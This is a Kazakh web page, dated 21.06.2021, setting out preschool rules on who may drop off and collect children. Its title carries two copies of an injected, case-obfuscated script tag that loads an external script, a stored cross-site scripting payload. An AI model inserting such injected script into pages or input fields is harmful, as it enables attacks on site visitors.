Мектепке дейінгі білім беру мекемесінің үй-жайында қауіпсіздікті қамтамасыз ету жөніндегі талаптар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.06.2021

Тәрбиеленушінің заңды өкілдері не олардың тапсырмасы бойынша оны мектепке дейінгі білім беру мекемесіне апаратын басқа да адамдар баланы тәрбиешіге, ал ол болмаған жағдайда — топ тәрбиеленушілерін қабылдауды жүзеге асыратын өзге де педагог қызметкерге беруге тиіс. Баланы мектепке дейінгі білім беру мекемесінен алып кету оның заңды өкілдері болуы керек. Егер олардың баланы мектепке дейінгі білім беру мекемесінен ала алмауының объективті себебі болса (ауру, қызметтік іссапар, жұмыс кестесі және т.б.), мұны тәрбиеленушінің заңды өкілдерінің мектепке дейінгі білім беру мекемесі басшысының атына берген өтініші негізінде басқа адамдар (жақын туыстары) жүзеге асыра алады (жеке басын растайтын барлық ілеспе құжаттармен). Тәрбиеленушілерді 16 жасқа толмаған жасөспірімдерге алкогольдік немесе есірткілік масаң күйдегі адамдарға беруге тыйым салынады.

Просмотров: 357


Пікір қосу



Деректерді қолтаңбаға қосу
Текст